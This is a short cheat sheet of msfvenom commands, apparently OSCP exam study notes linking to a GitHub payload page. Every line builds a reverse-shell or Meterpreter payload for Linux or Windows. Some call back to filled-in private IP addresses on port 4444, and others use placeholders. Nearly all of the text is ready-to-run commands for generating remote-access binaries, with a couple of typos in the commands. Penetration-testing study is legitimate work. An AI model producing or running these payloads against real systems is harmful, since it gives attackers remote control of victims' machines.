Generic Payloads:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.49.208 LPORT=4444-f raw > shell.sh
Linux:(Staged)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
(Inline)
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
mfsvenom -p linux/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows(Reverse Shells):
(PowerShell)
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=172.16.169.198 LPORT=4444 -f exe > reverse.exe
msfvenom -p windows/powershell_reverse_tcp LHOST=172.16.169.198 LPORT=4444 -f exe > reverse.exe
(Inline)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.169.198 LPORT=4444 -f exe > reverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST=172.16.169.198 LPORT=4444 -f exe > reverse.exe
(Staged)
msfvenom -p windows/x64/shell/reverse_tcp LHOST=172.16.169.198 LPORT=4444 -f exe > reverse.exe
msfvenom -p windows/shell/reverse_tcp LHOST=172.16.169.198 LPORT=4444 -f exe > reverse.exe
Github : https://github.com/rootsecdev/OSCP/blob/main/Payloads/msfvenom.md
*Beware click the link!